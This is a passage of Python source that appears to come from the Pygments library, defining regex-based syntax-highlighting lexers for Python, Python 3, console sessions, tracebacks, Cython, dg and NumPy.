aliases = ['python', 'py', 'sage']
filenames = ['*.py', '*.pyw', '*.sc', 'SConstruct', 'SConscript', '*.tac', '*.sage']
mimetypes = ['text/x-python', 'application/x-python']
tokens = {
'root': [
(r'\n', Text),
(r'^(\s*)([rRuU]{,2}"""(?:.|\n)*?""")', bygroups(Text, String.Doc)),
(r"^(\s*)([rRuU]{,2}'''(?:.|\n)*?''')", bygroups(Text, String.Doc)),
(r'[^\S\n]+', Text),
(r'#.*$', Comment),
(r'[]{}:(),;[]', Punctuation),
(r'\\\n', Text),
(r'\\', Text),
(r'(in|is|and|or|not)\b', Operator.Word),
(r'!=|==|<<|>>|[-~+/*%=<>&^|.]', Operator),
include('keywords'),
(r'(def)((?:\s|\\\s)+)', bygroups(Keyword, Text), 'funcname'),
(r'(class)((?:\s|\\\s)+)', bygroups(Keyword, Text), 'classname'),
(r'(from)((?:\s|\\\s)+)', bygroups(Keyword.Namespace, Text),
'fromimport'),
(r'(import)((?:\s|\\\s)+)', bygroups(Keyword.Namespace, Text),
'import'),
include('builtins'),
include('backtick'),
('(?:[rR]|[uU][rR]|[rR][uU])"""', String, 'tdqs'),
("(?:[rR]|[uU][rR]|[rR][uU])'''", String, 'tsqs'),
('(?:[rR]|[uU][rR]|[rR][uU])"', String, 'dqs'),
("(?:[rR]|[uU][rR]|[rR][uU])'", String, 'sqs'),
('[uU]?"""', String, combined('stringescape', 'tdqs')),
("[uU]?'''", String, combined('stringescape', 'tsqs')),
('[uU]?"', String, combined('stringescape', 'dqs')),
("[uU]?'", String, combined('stringescape', 'sqs')),
include('name'),
include('numbers'),
],
'keywords': [
(words((
'assert', 'break', 'continue', 'del', 'elif', 'else', 'except',
'exec', 'finally', 'for', 'global', 'if', 'lambda', 'pass',
'print', 'raise', 'return', 'try', 'while', 'yield',
'yield from', 'as', 'with'), suffix=r'\b'),
Keyword),
],
'builtins': [
(words((
'__import__', 'abs', 'all', 'any', 'apply', 'basestring', 'bin',
'bool', 'buffer', 'bytearray', 'bytes', 'callable', 'chr', 'classmethod',
'cmp', 'coerce', 'compile', 'complex', 'delattr', 'dict', 'dir', 'divmod',
'enumerate', 'eval', 'execfile', 'exit', 'file', 'filter', 'float',
'frozenset', 'getattr', 'globals', 'hasattr', 'hash', 'hex', 'id',
'input', 'int', 'intern', 'isinstance', 'issubclass', 'iter', 'len',
'list', 'locals', 'long', 'map', 'max', 'min', 'next', 'object',
'oct', 'open', 'ord', 'pow', 'property', 'range', 'raw_input', 'reduce',
'reload', 'repr', 'reversed', 'round', 'set', 'setattr', 'slice',
'sorted', 'staticmethod', 'str', 'sum', 'super', 'tuple', 'type',
'unichr', 'unicode', 'vars', 'xrange', 'zip'),
prefix=r'(?<!\.)', suffix=r'\b'),
Name.Builtin),
(r'(?<!\.)(self|None|Ellipsis|NotImplemented|False|True'
r')\b', Name.Builtin.Pseudo),
(words((
'ArithmeticError', 'AssertionError', 'AttributeError',
'BaseException', 'DeprecationWarning', 'EOFError', 'EnvironmentError',
'Exception', 'FloatingPointError', 'FutureWarning', 'GeneratorExit',
'IOError', 'ImportError', 'ImportWarning', 'IndentationError',
'IndexError', 'KeyError', 'KeyboardInterrupt', 'LookupError',
'MemoryError', 'NameError', 'NotImplemented', 'NotImplementedError',
'OSError', 'OverflowError', 'OverflowWarning', 'PendingDeprecationWarning',
'ReferenceError', 'RuntimeError', 'RuntimeWarning', 'StandardError',
'StopIteration', 'SyntaxError', 'SyntaxWarning', 'SystemError',
'SystemExit', 'TabError', 'TypeError', 'UnboundLocalError',
'UnicodeDecodeError', 'UnicodeEncodeError', 'UnicodeError',
'UnicodeTranslateError', 'UnicodeWarning', 'UserWarning',
'ValueError', 'VMSError', 'Warning', 'WindowsError',
'ZeroDivisionError'), prefix=r'(?<!\.)', suffix=r'\b'),
Name.Exception),
],
'numbers': [
(r'(\d+\.\d*|\d*\.\d+)([eE][+-]?[0-9]+)?j?', Number.Float),
(r'\d+[eE][+-]?[0-9]+j?', Number.Float),
(r'0[0-7]+j?', Number.Oct),
(r'0[bB][01]+', Number.Bin),
(r'0[xX][a-fA-F0-9]+', Number.Hex),
(r'\d+L', Number.Integer.Long),
(r'\d+j?', Number.Integer)
],
'backtick': [
('`.*?`', String.Backtick),
],
'name': [
(r'@[\w.]+', Name.Decorator),
('[a-zA-Z_]\w*', Name),
],
'funcname': [
('[a-zA-Z_]\w*', Name.Function, '#pop')
],
'classname': [
('[a-zA-Z_]\w*', Name.Class, '#pop')
],
'import': [
(r'(?:[ \t]|\\\n)+', Text),
(r'as\b', Keyword.Namespace),
(r',', Operator),
(r'[a-zA-Z_][\w.]*', Name.Namespace),
default('#pop') # all else: go back
],
'fromimport': [
(r'(?:[ \t]|\\\n)+', Text),
(r'import\b', Keyword.Namespace, '#pop'),
# if None occurs here, it's "raise x from None", since None can
# never be a module name
(r'None\b', Name.Builtin.Pseudo, '#pop'),
# sadly, in "raise x from y" y will be highlighted as namespace too
(r'[a-zA-Z_.][\w.]*', Name.Namespace),
# anything else here also means "raise x from y" and is therefore
# not an error
default('#pop'),
],
'stringescape': [
(r'\\([\\abfnrtv"\']|\n|N\{.*?\}|u[a-fA-F0-9]{4}|'
r'U[a-fA-F0-9]{8}|x[a-fA-F0-9]{2}|[0-7]{1,3})', String.Escape)
],
'strings': [
(r'%(\(\w+\))?[-#0 +]*([0-9]+|[*])?(\.([0-9]+|[*]))?'
'[hlL]?[diouxXeEfFgGcrs%]', String.Interpol),
(r'[^\\\'"%\n]+', String),
# quotes, percents and backslashes must be parsed one at a time
(r'[\'"\\]', String),
# unhandled string formatting sign
(r'%', String)
# newlines are an error (use "nl" state)
],
'nl': [
(r'\n', String)
],
'dqs': [
(r'"', String, '#pop'),
(r'\\\\|\\"|\\\n', String.Escape), # included here for raw strings
include('strings')
],
'sqs': [
(r"'", String, '#pop'),
(r"\\\\|\\'|\\\n", String.Escape), # included here for raw strings
include('strings')
],
'tdqs': [
(r'"""', String, '#pop'),
include('strings'),
include('nl')
],
'tsqs': [
(r"'''", String, '#pop'),
include('strings'),
include('nl')
],
}
def analyse_text(text):
return shebang_matches(text, r'pythonw?(2(\.\d)?)?') or \
'import ' in text[:1000]
class Python3Lexer(RegexLexer):
"""
For `Python <http://www.python.org>`_ source code (version 3.0).
.. versionadded:: 0.10
"""
name = 'Python 3'
aliases = ['python3', 'py3']
filenames = [] # Nothing until Python 3 gets widespread
mimetypes = ['text/x-python3', 'application/x-python3']
flags = re.MULTILINE | re.UNICODE
uni_name = "[%s][%s]*" % (uni.xid_start, uni.xid_continue)
tokens = PythonLexer.tokens.copy()
tokens['keywords'] = [
(words((
'assert', 'break', 'continue', 'del', 'elif', 'else', 'except',
'finally', 'for', 'global', 'if', 'lambda', 'pass', 'raise',
'nonlocal', 'return', 'try', 'while', 'yield', 'yield from', 'as',
'with', 'True', 'False', 'None'), suffix=r'\b'),
Keyword),
]
tokens['builtins'] = [
(words((
'__import__', 'abs', 'all', 'any', 'bin', 'bool', 'bytearray', 'bytes',
'chr', 'classmethod', 'cmp', 'compile', 'complex', 'delattr', 'dict',
'dir', 'divmod', 'enumerate', 'eval', 'filter', 'float', 'format',
'frozenset', 'getattr', 'globals', 'hasattr', 'hash', 'hex', 'id',
'input', 'int', 'isinstance', 'issubclass', 'iter', 'len', 'list',
'locals', 'map', 'max', 'memoryview', 'min', 'next', 'object', 'oct',
'open', 'ord', 'pow', 'print', 'property', 'range', 'repr', 'reversed',
'round', 'set', 'setattr', 'slice', 'sorted', 'staticmethod', 'str',
'sum', 'super', 'tuple', 'type', 'vars', 'zip'), prefix=r'(?<!\.)',
suffix=r'\b'),
Name.Builtin),
(r'(?<!\.)(self|Ellipsis|NotImplemented)\b', Name.Builtin.Pseudo),
(words((
'ArithmeticError', 'AssertionError', 'AttributeError',
'BaseException', 'BufferError', 'BytesWarning', 'DeprecationWarning',
'EOFError', 'EnvironmentError', 'Exception', 'FloatingPointError',
'FutureWarning', 'GeneratorExit', 'IOError', 'ImportError',
'ImportWarning', 'IndentationError', 'IndexError', 'KeyError',
'KeyboardInterrupt', 'LookupError', 'MemoryError', 'NameError',
'NotImplementedError', 'OSError', 'OverflowError',
'PendingDeprecationWarning', 'ReferenceError',
'RuntimeError', 'RuntimeWarning', 'StopIteration',
'SyntaxError', 'SyntaxWarning', 'SystemError', 'SystemExit', 'TabError',
'TypeError', 'UnboundLocalError', 'UnicodeDecodeError',
'UnicodeEncodeError', 'UnicodeError', 'UnicodeTranslateError',
'UnicodeWarning', 'UserWarning', 'ValueError', 'VMSError', 'Warning',
'WindowsError', 'ZeroDivisionError',
# new builtin exceptions from PEP 3151
'BlockingIOError', 'ChildProcessError', 'ConnectionError',
'BrokenPipeError', 'ConnectionAbortedError', 'ConnectionRefusedError',
'ConnectionResetError', 'FileExistsError', 'FileNotFoundError',
'InterruptedError', 'IsADirectoryError', 'NotADirectoryError',
'PermissionError', 'ProcessLookupError', 'TimeoutError'),
prefix=r'(?<!\.)', suffix=r'\b'),
Name.Exception),
]
tokens['numbers'] = [
(r'(\d+\.\d*|\d*\.\d+)([eE][+-]?[0-9]+)?', Number.Float),
(r'0[oO][0-7]+', Number.Oct),
(r'0[bB][01]+', Number.Bin),
(r'0[xX][a-fA-F0-9]+', Number.Hex),
(r'\d+', Number.Integer)
]
tokens['backtick'] = []
tokens['name'] = [
(r'@\w+', Name.Decorator),
(uni_name, Name),
]
tokens['funcname'] = [
(uni_name, Name.Function, '#pop')
]
tokens['classname'] = [
(uni_name, Name.Class, '#pop')
]
tokens['import'] = [
(r'(\s+)(as)(\s+)', bygroups(Text, Keyword, Text)),
(r'\.', Name.Namespace),
(uni_name, Name.Namespace),
(r'(\s*)(,)(\s*)', bygroups(Text, Operator, Text)),
default('#pop') # all else: go back
]
tokens['fromimport'] = [
(r'(\s+)(import)\b', bygroups(Text, Keyword), '#pop'),
(r'\.', Name.Namespace),
(uni_name, Name.Namespace),
default('#pop'),
]
# don't highlight "%s" substitutions
tokens['strings'] = [
(r'[^\\\'"%\n]+', String),
# quotes, percents and backslashes must be parsed one at a time
(r'[\'"\\]', String),
# unhandled string formatting sign
(r'%', String)
# newlines are an error (use "nl" state)
]
def analyse_text(text):
return shebang_matches(text, r'pythonw?3(\.\d)?')
class PythonConsoleLexer(Lexer):
"""
For Python console output or doctests, such as:
.. sourcecode:: pycon
>>> a = 'foo'
>>> print a
foo
>>> 1 / 0
Traceback (most recent call last):
File "<stdin>", line 1, in <module>
ZeroDivisionError: integer division or modulo by zero
Additional options:
`python3`
Use Python 3 lexer for code. Default is ``False``.
.. versionadded:: 1.0
"""
name = 'Python console session'
aliases = ['pycon']
mimetypes = ['text/x-python-doctest']
def __init__(self, **options):
self.python3 = get_bool_opt(options, 'python3', False)
Lexer.__init__(self, **options)
def get_tokens_unprocessed(self, text):
if self.python3:
pylexer = Python3Lexer(**self.options)
tblexer = Python3TracebackLexer(**self.options)
else:
pylexer = PythonLexer(**self.options)
tblexer = PythonTracebackLexer(**self.options)
curcode = ''
insertions = []
curtb = ''
tbindex = 0
tb = 0
for match in line_re.finditer(text):
line = match.group()
if line.startswith(u'>>> ') or line.startswith(u'... '):
tb = 0
insertions.append((len(curcode),
[(0, Generic.Prompt, line[:4])]))
curcode += line[4:]
elif line.rstrip() == u'...' and not tb:
# only a new >>> prompt can end an exception block
# otherwise an ellipsis in place of the traceback frames
# will be mishandled
insertions.append((len(curcode),
[(0, Generic.Prompt, u'...')]))
curcode += line[3:]
else:
if curcode:
for item in do_insertions(
insertions, pylexer.get_tokens_unprocessed(curcode)):
yield item
curcode = ''
insertions = []
if (line.startswith(u'Traceback (most recent call last):') or
re.match(u' File "[^"]+", line \\d+\\n$', line)):
tb = 1
curtb = line
tbindex = match.start()
elif line == 'KeyboardInterrupt\n':
yield match.start(), Name.Class, line
elif tb:
curtb += line
if not (line.startswith(' ') or line.strip() == u'...'):
tb = 0
for i, t, v in tblexer.get_tokens_unprocessed(curtb):
yield tbindex+i, t, v
curtb = ''
else:
yield match.start(), Generic.Output, line
if curcode:
for item in do_insertions(insertions,
pylexer.get_tokens_unprocessed(curcode)):
yield item
if curtb:
for i, t, v in tblexer.get_tokens_unprocessed(curtb):
yield tbindex+i, t, v
class PythonTracebackLexer(RegexLexer):
"""
For Python tracebacks.
.. versionadded:: 0.7
"""
name = 'Python Traceback'
aliases = ['pytb']
filenames = ['*.pytb']
mimetypes = ['text/x-python-traceback']
tokens = {
'root': [
(r'^Traceback \(most recent call last\):\n',
Generic.Traceback, 'intb'),
# SyntaxError starts with this.
(r'^(?= File "[^"]+", line \d+)', Generic.Traceback, 'intb'),
(r'^.*\n', Other),
],
'intb': [
(r'^( File )("[^"]+")(, line )(\d+)(, in )(.+)(\n)',
bygroups(Text, Name.Builtin, Text, Number, Text, Name, Text)),
(r'^( File )("[^"]+")(, line )(\d+)(\n)',
bygroups(Text, Name.Builtin, Text, Number, Text)),
(r'^( )(.+)(\n)',
bygroups(Text, using(PythonLexer), Text)),
(r'^([ \t]*)(\.\.\.)(\n)',
bygroups(Text, Comment, Text)), # for doctests...
(r'^([^:]+)(: )(.+)(\n)',
bygroups(Generic.Error, Text, Name, Text), '#pop'),
(r'^([a-zA-Z_]\w*)(:?\n)',
bygroups(Generic.Error, Text), '#pop')
],
}
class Python3TracebackLexer(RegexLexer):
"""
For Python 3.0 tracebacks, with support for chained exceptions.
.. versionadded:: 1.0
"""
name = 'Python 3.0 Traceback'
aliases = ['py3tb']
filenames = ['*.py3tb']
mimetypes = ['text/x-python3-traceback']
tokens = {
'root': [
(r'\n', Text),
(r'^Traceback \(most recent call last\):\n', Generic.Traceback, 'intb'),
(r'^During handling of the above exception, another '
r'exception occurred:\n\n', Generic.Traceback),
(r'^The above exception was the direct cause of the '
r'following exception:\n\n', Generic.Traceback),
(r'^(?= File "[^"]+", line \d+)', Generic.Traceback, 'intb'),
],
'intb': [
(r'^( File )("[^"]+")(, line )(\d+)(, in )(.+)(\n)',
bygroups(Text, Name.Builtin, Text, Number, Text, Name, Text)),
(r'^( File )("[^"]+")(, line )(\d+)(\n)',
bygroups(Text, Name.Builtin, Text, Number, Text)),
(r'^( )(.+)(\n)',
bygroups(Text, using(Python3Lexer), Text)),
(r'^([ \t]*)(\.\.\.)(\n)',
bygroups(Text, Comment, Text)), # for doctests...
(r'^([^:]+)(: )(.+)(\n)',
bygroups(Generic.Error, Text, Name, Text), '#pop'),
(r'^([a-zA-Z_]\w*)(:?\n)',
bygroups(Generic.Error, Text), '#pop')
],
}
class CythonLexer(RegexLexer):
"""
For Pyrex and `Cython <http://cython.org>`_ source code.
.. versionadded:: 1.1
"""
name = 'Cython'
aliases = ['cython', 'pyx', 'pyrex']
filenames = ['*.pyx', '*.pxd', '*.pxi']
mimetypes = ['text/x-cython', 'application/x-cython']
tokens = {
'root': [
(r'\n', Text),
(r'^(\s*)("""(?:.|\n)*?""")', bygroups(Text, String.Doc)),
(r"^(\s*)('''(?:.|\n)*?''')", bygroups(Text, String.Doc)),
(r'[^\S\n]+', Text),
(r'#.*$', Comment),
(r'[]{}:(),;[]', Punctuation),
(r'\\\n', Text),
(r'\\', Text),
(r'(in|is|and|or|not)\b', Operator.Word),
(r'(<)([a-zA-Z0-9.?]+)(>)',
bygroups(Punctuation, Keyword.Type, Punctuation)),
(r'!=|==|<<|>>|[-~+/*%=<>&^|.?]', Operator),
(r'(from)(\d+)(<=)(\s+)(<)(\d+)(:)',
bygroups(Keyword, Number.Integer, Operator, Name, Operator,
Name, Punctuation)),
include('keywords'),
(r'(def|property)(\s+)', bygroups(Keyword, Text), 'funcname'),
(r'(cp?def)(\s+)', bygroups(Keyword, Text), 'cdef'),
(r'(class|struct)(\s+)', bygroups(Keyword, Text), 'classname'),
(r'(from)(\s+)', bygroups(Keyword, Text), 'fromimport'),
(r'(c?import)(\s+)', bygroups(Keyword, Text), 'import'),
include('builtins'),
include('backtick'),
('(?:[rR]|[uU][rR]|[rR][uU])"""', String, 'tdqs'),
("(?:[rR]|[uU][rR]|[rR][uU])'''", String, 'tsqs'),
('(?:[rR]|[uU][rR]|[rR][uU])"', String, 'dqs'),
("(?:[rR]|[uU][rR]|[rR][uU])'", String, 'sqs'),
('[uU]?"""', String, combined('stringescape', 'tdqs')),
("[uU]?'''", String, combined('stringescape', 'tsqs')),
('[uU]?"', String, combined('stringescape', 'dqs')),
("[uU]?'", String, combined('stringescape', 'sqs')),
include('name'),
include('numbers'),
],
'keywords': [
(words((
'assert', 'break', 'by', 'continue', 'ctypedef', 'del', 'elif',
'else', 'except', 'except?', 'exec', 'finally', 'for', 'gil',
'global', 'if', 'include', 'lambda', 'nogil', 'pass', 'print',
'raise', 'return', 'try', 'while', 'yield', 'as', 'with'), suffix=r'\b'),
Keyword),
(r'(DEF|IF|ELIF|ELSE)\b', Comment.Preproc),
],
'builtins': [
(words((
'__import__', 'abs', 'all', 'any', 'apply', 'basestring', 'bin',
'bool', 'buffer', 'bytearray', 'bytes', 'callable', 'chr',
'classmethod', 'cmp', 'coerce', 'compile', 'complex', 'delattr',
'dict', 'dir', 'divmod', 'enumerate', 'eval', 'execfile', 'exit',
'file', 'filter', 'float', 'frozenset', 'getattr', 'globals',
'hasattr', 'hash', 'hex', 'id', 'input', 'int', 'intern', 'isinstance',
'issubclass', 'iter', 'len', 'list', 'locals', 'long', 'map', 'max',
'min', 'next', 'object', 'oct', 'open', 'ord', 'pow', 'property',
'range', 'raw_input', 'reduce', 'reload', 'repr', 'reversed',
'round', 'set', 'setattr', 'slice', 'sorted', 'staticmethod',
'str', 'sum', 'super', 'tuple', 'type', 'unichr', 'unicode',
'vars', 'xrange', 'zip'), prefix=r'(?<!\.)', suffix=r'\b'),
Name.Builtin),
(r'(?<!\.)(self|None|Ellipsis|NotImplemented|False|True|NULL'
r')\b', Name.Builtin.Pseudo),
(words((
'ArithmeticError', 'AssertionError', 'AttributeError',
'BaseException', 'DeprecationWarning', 'EOFError', 'EnvironmentError',
'Exception', 'FloatingPointError', 'FutureWarning', 'GeneratorExit', 'IOError',
'ImportError', 'ImportWarning', 'IndentationError', 'IndexError', 'KeyError',
'KeyboardInterrupt', 'LookupError', 'MemoryError', 'NameError',
'NotImplemented', 'NotImplementedError', 'OSError', 'OverflowError',
'OverflowWarning', 'PendingDeprecationWarning', 'ReferenceError',
'RuntimeError', 'RuntimeWarning', 'StandardError', 'StopIteration',
'SyntaxError', 'SyntaxWarning', 'SystemError', 'SystemExit', 'TabError',
'TypeError', 'UnboundLocalError', 'UnicodeDecodeError',
'UnicodeEncodeError', 'UnicodeError', 'UnicodeTranslateError',
'UnicodeWarning', 'UserWarning', 'ValueError', 'Warning',
'ZeroDivisionError'), prefix=r'(?<!\.)', suffix=r'\b'),
Name.Exception),
],
'numbers': [
(r'(\d+\.?\d*|\d*\.\d+)([eE][+-]?[0-9]+)?', Number.Float),
(r'0\d+', Number.Oct),
(r'0[xX][a-fA-F0-9]+', Number.Hex),
(r'\d+L', Number.Integer.Long),
(r'\d+', Number.Integer)
],
'backtick': [
('`.*?`', String.Backtick),
],
'name': [
(r'@\w+', Name.Decorator),
('[a-zA-Z_]\w*', Name),
],
'funcname': [
('[a-zA-Z_]\w*', Name.Function, '#pop')
],
'cdef': [
(r'(public|readonly|extern|api|inline)\b', Keyword.Reserved),
(r'(struct|enum|union|class)\b', Keyword),
(r'([a-zA-Z_]\w*)(\s*)(?=[(:#=]|$)',
bygroups(Name.Function, Text), '#pop'),
(r'([a-zA-Z_]\w*)(\s*)(,)',
bygroups(Name.Function, Text, Punctuation)),
(r'from\b', Keyword, '#pop'),
(r'as\b', Keyword),
(r':', Punctuation, '#pop'),
(r'(?=["\'])', Text, '#pop'),
(r'[a-zA-Z_]\w*', Keyword.Type),
(r'.', Text),
],
'classname': [
('[a-zA-Z_]\w*', Name.Class, '#pop')
],
'import': [
(r'(\s+)(as)(\s+)', bygroups(Text, Keyword, Text)),
(r'[a-zA-Z_][\w.]*', Name.Namespace),
(r'(\s*)(,)(\s*)', bygroups(Text, Operator, Text)),
default('#pop') # all else: go back
],
'fromimport': [
(r'(\s+)(c?import)\b', bygroups(Text, Keyword), '#pop'),
(r'[a-zA-Z_.][\w.]*', Name.Namespace),
# ``cdef foo from "header"``, or ``for foo from 0 < i < 10``
default('#pop'),
],
'stringescape': [
(r'\\([\\abfnrtv"\']|\n|N\{.*?\}|u[a-fA-F0-9]{4}|'
r'U[a-fA-F0-9]{8}|x[a-fA-F0-9]{2}|[0-7]{1,3})', String.Escape)
],
'strings': [
(r'%(\([a-zA-Z0-9]+\))?[-#0 +]*([0-9]+|[*])?(\.([0-9]+|[*]))?'
'[hlL]?[diouxXeEfFgGcrs%]', String.Interpol),
(r'[^\\\'"%\n]+', String),
# quotes, percents and backslashes must be parsed one at a time
(r'[\'"\\]', String),
# unhandled string formatting sign
(r'%', String)
# newlines are an error (use "nl" state)
],
'nl': [
(r'\n', String)
],
'dqs': [
(r'"', String, '#pop'),
(r'\\\\|\\"|\\\n', String.Escape), # included here again for raw strings
include('strings')
],
'sqs': [
(r"'", String, '#pop'),
(r"\\\\|\\'|\\\n", String.Escape), # included here again for raw strings
include('strings')
],
'tdqs': [
(r'"""', String, '#pop'),
include('strings'),
include('nl')
],
'tsqs': [
(r"'''", String, '#pop'),
include('strings'),
include('nl')
],
}
class DgLexer(RegexLexer):
"""
Lexer for `dg <http://pyos.github.com/dg>`_,
a functional and object-oriented programming language
running on the CPython 3 VM.
.. versionadded:: 1.6
"""
name = 'dg'
aliases = ['dg']
filenames = ['*.dg']
mimetypes = ['text/x-dg']
tokens = {
'root': [
(r'\s+', Text),
(r'#.*?$', Comment.Single),
(r'(?i)0b[01]+', Number.Bin),
(r'(?i)0o[0-7]+', Number.Oct),
(r'(?i)0x[0-9a-f]+', Number.Hex),
(r'(?i)[+-]?[0-9]+\.[0-9]+(e[+-]?[0-9]+)?j?', Number.Float),
(r'(?i)[+-]?[0-9]+e[+-]?\d+j?', Number.Float),
(r'(?i)[+-]?[0-9]+j?', Number.Integer),
(r"(?i)(br|r?b?)'''", String, combined('stringescape', 'tsqs', 'string')),
(r'(?i)(br|r?b?)"""', String, combined('stringescape', 'tdqs', 'string')),
(r"(?i)(br|r?b?)'", String, combined('stringescape', 'sqs', 'string')),
(r'(?i)(br|r?b?)"', String, combined('stringescape', 'dqs', 'string')),
(r"`\w+'*`", Operator),
(r'\b(and|in|is|or|where)\b', Operator.Word),
(r'[!$%&*+\-./:<-@\\^|~;,]+', Operator),
(words((
'bool', 'bytearray', 'bytes', 'classmethod', 'complex', 'dict', 'dict\'',
'float', 'frozenset', 'int', 'list', 'list\'', 'memoryview', 'object',
'property', 'range', 'set', 'set\'', 'slice', 'staticmethod', 'str', 'super',
'tuple', 'tuple\'', 'type'), prefix=r'(?<!\.)', suffix=r'(?![\'\w])'),
Name.Builtin),
(words((
'__import__', 'abs', 'all', 'any', 'bin', 'bind', 'chr', 'cmp', 'compile',
'complex', 'delattr', 'dir', 'divmod', 'drop', 'dropwhile', 'enumerate',
'eval', 'exhaust', 'filter', 'flip', 'foldl1?', 'format', 'fst', 'getattr',
'globals', 'hasattr', 'hash', 'head', 'hex', 'id', 'init', 'input',
'isinstance', 'issubclass', 'iter', 'iterate', 'last', 'len', 'locals',
'map', 'max', 'min', 'next', 'oct', 'open', 'ord', 'pow', 'print', 'repr',
'reversed', 'round', 'setattr', 'scanl1?', 'snd', 'sorted', 'sum', 'tail',
'take', 'takewhile', 'vars', 'zip'), prefix=r'(?<!\.)', suffix=r'(?![\'\w])'),
Name.Builtin),
(r"(?<!\.)(self|Ellipsis|NotImplemented|None|True|False)(?!['\w])",
Name.Builtin.Pseudo),
(r"(?<!\.)[A-Z]\w*(Error|Exception|Warning)'*(?!['\w])",
Name.Exception),
(r"(?<!\.)(Exception|GeneratorExit|KeyboardInterrupt|StopIteration|"
r"SystemExit)(?!['\w])", Name.Exception),
(r"(?<![\w.])(except|finally|for|if|import|not|otherwise|raise|"
r"subclass|while|with|yield)(?!['\w])", Keyword.Reserved),
(r"[A-Z_]+'*(?!['\w])", Name),
(r"[A-Z]\w+'*(?!['\w])", Keyword.Type),
(r"\w+'*", Name),
(r'[()]', Punctuation),
(r'.', Error),
],
'stringescape': [
(r'\\([\\abfnrtv"\']|\n|N\{.*?\}|u[a-fA-F0-9]{4}|'
r'U[a-fA-F0-9]{8}|x[a-fA-F0-9]{2}|[0-7]{1,3})', String.Escape)
],
'string': [
(r'%(\(\w+\))?[-#0 +]*([0-9]+|[*])?(\.([0-9]+|[*]))?'
'[hlL]?[diouxXeEfFgGcrs%]', String.Interpol),
(r'[^\\\'"%\n]+', String),
# quotes, percents and backslashes must be parsed one at a time
(r'[\'"\\]', String),
# unhandled string formatting sign
(r'%', String),
(r'\n', String)
],
'dqs': [
(r'"', String, '#pop')
],
'sqs': [
(r"'", String, '#pop')
],
'tdqs': [
(r'"""', String, '#pop')
],
'tsqs': [
(r"'''", String, '#pop')
],
}
class NumPyLexer(PythonLexer):
"""
A Python lexer recognizing Numerical Python builtins.
.. versionadded:: 0.10
"""
name = 'NumPy'
aliases = ['numpy']
# override the mimetypes to not inherit them from python
mimetypes = []
filenames = []
EXTRA_KEYWORDS = set((
'abs', 'absolute', 'accumulate', 'add', 'alen', 'all', 'allclose',
'alltrue', 'alterdot', 'amax', 'amin', 'angle', 'any', 'append',
'apply_along_axis', 'apply_over_axes', 'arange', 'arccos', 'arccosh',
'arcsin', 'arcsinh', 'arctan', 'arctan2', 'arctanh', 'argmax', 'argmin',
'argsort', 'argwhere', 'around', 'array', 'array2string', 'array_equal',
'array_equiv', 'array_repr', 'array_split', 'array_str', 'arrayrange',
'asanyarray', 'asarray', 'asarray_chkfinite', 'ascontiguousarray',
'asfarray', 'asfortranarray', 'asmatrix', 'asscalar', 'astype',
'atleast_1d', 'atleast_2d', 'atleast_3d', 'average', 'bartlett',
'base_repr', 'beta', 'binary_repr', 'bincount', 'binomial',
'bitwise_and', 'bitwise_not', 'bitwise_or', 'bitwise_xor', 'blackman',
'bmat', 'broadcast', 'byte_bounds', 'bytes', 'byteswap', 'c_',
'can_cast', 'ceil', 'choose', 'clip', 'column_stack', 'common_type',
'compare_chararrays', 'compress', 'concatenate', 'conj', 'conjugate',
'convolve', 'copy', 'corrcoef', 'correlate', 'cos', 'cosh', 'cov',
'cross', 'cumprod', 'cumproduct', 'cumsum', 'delete', 'deprecate',
'diag', 'diagflat', 'diagonal', 'diff', 'digitize', 'disp', 'divide',
'dot', 'dsplit', 'dstack', 'dtype', 'dump', 'dumps', 'ediff1d', 'empty',
'empty_like', 'equal', 'exp', 'expand_dims', 'expm1', 'extract', 'eye',
'fabs', 'fastCopyAndTranspose', 'fft', 'fftfreq', 'fftshift', 'fill',
'finfo', 'fix', 'flat', 'flatnonzero', 'flatten', 'fliplr', 'flipud',
'floor', 'floor_divide', 'fmod', 'frexp', 'fromarrays', 'frombuffer',
'fromfile', 'fromfunction', 'fromiter', 'frompyfunc', 'fromstring',
'generic', 'get_array_wrap', 'get_include', 'get_numarray_include',
'get_numpy_include', 'get_printoptions', 'getbuffer', 'getbufsize',
'geterr', 'geterrcall', 'geterrobj', 'getfield', 'gradient', 'greater',
'greater_equal', 'gumbel', 'hamming', 'hanning', 'histogram',
'histogram2d', 'histogramdd', 'hsplit', 'hstack', 'hypot', 'i0',
'identity', 'ifft', 'imag', 'index_exp', 'indices', 'inf', 'info',
'inner', 'insert', 'int_asbuffer', 'interp', 'intersect1d',
'intersect1d_nu', 'inv', 'invert', 'iscomplex', 'iscomplexobj',
'isfinite', 'isfortran', 'isinf', 'isnan', 'isneginf', 'isposinf',
'isreal', 'isrealobj', 'isscalar', 'issctype', 'issubclass_',
'issubdtype', 'issubsctype', 'item', 'itemset', 'iterable', 'ix_',
'kaiser', 'kron', 'ldexp', 'left_shift', 'less', 'less_equal', 'lexsort',
'linspace', 'load', 'loads', 'loadtxt', 'log', 'log10', 'log1p', 'log2',
'logical_and', 'logical_not', 'logical_or', 'logical_xor', 'logspace',
'lstsq', 'mat', 'matrix', 'max', 'maximum', 'maximum_sctype',
'may_share_memory', 'mean', 'median', 'meshgrid', 'mgrid', 'min',
'minimum', 'mintypecode', 'mod', 'modf', 'msort', 'multiply', 'nan',
'nan_to_num', 'nanargmax', 'nanargmin', 'nanmax', 'nanmin', 'nansum',
'ndenumerate', 'ndim', 'ndindex', 'negative', 'newaxis', 'newbuffer',
'newbyteorder', 'nonzero', 'not_equal', 'obj2sctype', 'ogrid', 'ones',
'ones_like', 'outer', 'permutation', 'piecewise', 'pinv', 'pkgload',
'place', 'poisson', 'poly', 'poly1d', 'polyadd', 'polyder', 'polydiv',
'polyfit', 'polyint', 'polymul', 'polysub', 'polyval', 'power', 'prod',
'product', 'ptp', 'put', 'putmask', 'r_', 'randint', 'random_integers',
'random_sample', 'ranf', 'rank', 'ravel', 'real', 'real_if_close',
'recarray', 'reciprocal', 'reduce', 'remainder', 'repeat', 'require',
'reshape', 'resize', 'restoredot', 'right_shift', 'rint', 'roll',
'rollaxis', 'roots', 'rot90', 'round', 'round_', 'row_stack', 's_',
'sample', 'savetxt', 'sctype2char', 'searchsorted', 'seed', 'select',
'set_numeric_ops', 'set_printoptions', 'set_string_function',
'setbufsize', 'setdiff1d', 'seterr', 'seterrcall', 'seterrobj',
'setfield', 'setflags', 'setmember1d', 'setxor1d', 'shape',
'show_config', 'shuffle', 'sign', 'signbit', 'sin', 'sinc', 'sinh',
'size', 'slice', 'solve', 'sometrue', 'sort', 'sort_complex', 'source',
'split', 'sqrt', 'square', 'squeeze', 'standard_normal', 'std',
